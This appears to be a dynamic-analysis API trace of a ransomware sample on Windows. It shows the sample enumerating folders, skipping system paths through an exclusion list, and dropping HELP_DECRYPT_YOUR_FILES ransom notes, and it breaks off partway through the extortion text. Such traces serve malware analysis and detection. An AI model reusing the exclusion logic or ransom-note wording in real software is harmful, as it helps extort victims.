	[0158.635] CreateFileW (lpFileName="C:\\Users\\All Users\\Documents\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\documents\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.635] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.636] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.636] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0158.636] CloseHandle (hObject=0x380) returned 1
	[0158.636] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Documents\\*.*" (normalized: "c:\\users\\all users\\documents\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7805c32a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7805c32a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x780a8864, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0xffffffff
	[0158.637] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0158.637] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c1d81c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77fe9d62, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0158.637] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77bf771a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77bf771a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77fc38bf, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0158.637] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1
	[0158.637] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1
	[0158.637] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1
	[0158.637] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.637] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0158.638] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0158.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0158.638] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\Microsoft\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0158.638] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\*.*") returned="C:\\Users\\All Users\\Microsoft\\*.*"
	[0158.638] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\*.*" (normalized: "c:\\users\\all users\\microsoft\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9830
	[0158.639] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\*.*") returned 32
	[0158.639] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.639] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\*.*", cchLength=0x20 | out: lpsz="c:\\users\\all users\\microsoft\\*.*") returned 0x20
	[0158.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.639] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="windows") returned 0x0
	[0158.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="boot") returned 0x0
	[0158.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="system volume information") returned 0x0
	[0158.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.640] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="temp") returned 0x0
	[0158.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="program files") returned 0x0
	[0158.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.641] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="appdata") returned 0x0
	[0158.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="application data") returned 0x0
	[0158.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.642] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="winnt") returned 0x0
	[0158.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="tmp") returned 0x0
	[0158.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="cache") returned 0x0
	[0158.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.643] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="webcache") returned 0x0
	[0158.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.644] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="inetcache") returned 0x0
	[0158.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.644] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="nvidia") returned 0x0
	[0158.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.644] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="packages") returned 0x0
	[0158.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.645] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="cookies") returned 0x0
	[0158.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.645] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\*.*", lpSrch="programdata") returned 0x0
	[0158.645] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x1b54cf26, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b54cf26, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.645] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xd5e44e88, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0xd5e44e88, ftLastWriteTime.dwHighDateTime=0x1d8a64a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ClickToRun", cAlternateFileName="CLICKT~1")) returned 1
	[0158.645] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd54314ca, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd54314ca, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1
	[0158.645] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DataMart", cAlternateFileName="")) returned 1
	[0158.645] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DeviceSync", cAlternateFileName="DEVICE~2")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd17b1a49, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd17b1a49, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Diagnosis", cAlternateFileName="DIAGNO~1")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DRM", cAlternateFileName="")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IdentityCRL", cAlternateFileName="IDENTI~1")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MapData", cAlternateFileName="")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetFramework", cAlternateFileName="NETFRA~1")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x1b54cf26, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0xc92ad7bc, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0xc92ad7bc, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe4b6f3a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbe4b6f3a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Provisioning", cAlternateFileName="PROVIS~1")) returned 1
	[0158.646] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmsRouter", cAlternateFileName="SMSROU~1")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3d47fe2c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d47fe2c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Vault", cAlternateFileName="")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WDF", cAlternateFileName="")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77d1fe08, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77d1fe08, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35c3f417, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6520aed4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~1")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3731a3a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x3731a3a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live", cAlternateFileName="WINDOW~2")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~3")) returned 1
	[0158.647] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WinMSIPC", cAlternateFileName="")) returned 1
	[0158.648] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WwanSvc", cAlternateFileName="")) returned 1
	[0158.648] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XboxLive", cAlternateFileName="")) returned 1
	[0158.648] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4ebc8954, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4ebc8954, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4ebc8954, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XboxLive", cAlternateFileName="")) returned 0
	[0158.648] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0158.648] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0158.649] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0158.649] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\*.*") returned="C:\\Users\\All Users\\Microsoft\\*.*"
	[0158.649] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.649] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.658] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.TXT") returned 56
	[0158.658] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0158.660] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining 